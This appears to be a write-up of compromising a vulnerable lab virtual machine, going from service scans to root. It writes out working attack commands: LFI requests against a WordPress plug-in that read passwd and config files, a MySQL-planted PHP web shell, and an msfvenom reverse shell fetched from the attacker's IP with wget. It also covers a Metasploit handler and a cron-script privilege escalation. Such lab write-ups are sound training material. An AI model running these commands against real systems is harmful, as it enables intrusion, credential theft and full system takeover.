Adding the IP address of the VM to the hosts file allows one to cut down on some typing.

Executive Summary

This machine had several services running, some of which revealed employee names and accounts that could later be leveraged to compromise the system. A Wordpress plug-in vulnerability was found and used to extract database credentials, which then led to a non-privileged shell. Once scanned, it was discovered that a script ran every 20 minutes as the root user and that the script was writable to our non-privileged user. This was leveraged to create a root shell by replacing the file contents with a malicious payload.

Execution

An initial recon scan on the target revealed the following services:

>> onetwopunch -t ip_addresses.txt -p tcp

All together, individual inspection of the services revealed a plethora of information about the company and its employees. This section will cover the most direct route to root, but see the Additional Discovery section for that information.

Using nikto against the service on port 12380 revealed additional paths using the https protocol.

>> nikto -host vm:12380

The site hosted at /blogblog is a Wordpress blog with a vulnerable plug-in, as discovered by wpscan.

wpscan -u https://vm:12380/blogblog/

This LFI vulnerability allows an attacker to read the contents of a file on the system by using that file as a “thumbnail” for a post. An attacker could use this to read the contents of the Wordpress configuration file which has database credentials. The user account list for this machine was also acquired using this method.

>> curl -k "https://vm:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=9898092807434134&short=rnd&term=rnd&thumb=../../../../../etc/passwd"
>> curl -k "https://vm:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=9898092807434134&short=rnd&term=rnd&thumb=../wp-config.php"

By curling the “image” urls, the contents can be read.

With credentials and an open 3306 port, an attacker can log in and create a malicious file that would allow remote code execution.

>> mysql -h vm -u root -p wordpress

mysql>> SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/root/www/rce.php'

With remote code execution enabled, an attacker can download a malicious payload that initiates a reverse shell.

# start a web server to host the payload
>> systemctl start apache2

#create the payload in the web directory
>> msfvenom -p php/meterpreter_reverse_tcp LPORT=443 LHOST=$HOST_IP -t raw > /var/www/html/qq.php

# trigger remote commands that download the payload from the attacker's computer
>> curl "vm/rce.php?cmd=wget 192.168.110.101/qq.php"
>> curl "vm/rce.php?cmd=ls"

A listener/handler is configured and the reverse shell kicked off on the victim computer

>> msfconsole -x "use exploit/multi/handler"

msfconsole>> set PAYLOAD php/meterpreter_reverse_tcp
msfconsolemsfconsole>> set LPORT 443
msfconsole>> exploit -j

# start the shell
>> curl "vm/qq.php"

An attacker can now enumerate the contents of the victim’s file system, allowing them identify any vulnerable or mis-configured services that would allow them to elevate privileges. In this case, a cron script was running a world-modifiable file as root.

Further inspection of this scheduled task:

This task runs as the root user. All that was needed to become root was to replace the contents of the script with a reverse shell.

Additional Discovery

SMB enumeration and unprotected shares revealed some employee names and personal notes

Port 666 was serving a zip file of a screenshot of another personal note. The exif contained some notes for the attacker.

The anonymous ftp login also leaks information.

Port 80 scan initially returned what looked like a user’s dotfiles. This gave me the idea that someone may be running a web server from their home directory.

The Wordpress site could have been used as another vector for a shell by adding a reverse shell plug-in. The users and passwords were crackable with the rockyou word list. Some users also reused their Wordpress passwords for their machine accounts.

>> wpscan -u https://vm:12380/blogblog/ --enumerate u

Without accessing the computer’s /etc/passwd file, this gathering of information revealed the existence of the following employees and a accounts:

barry
dave
elly
fred
garry
harry
heather
john
kathy
pam
peter
scott
tim
vicki
zoe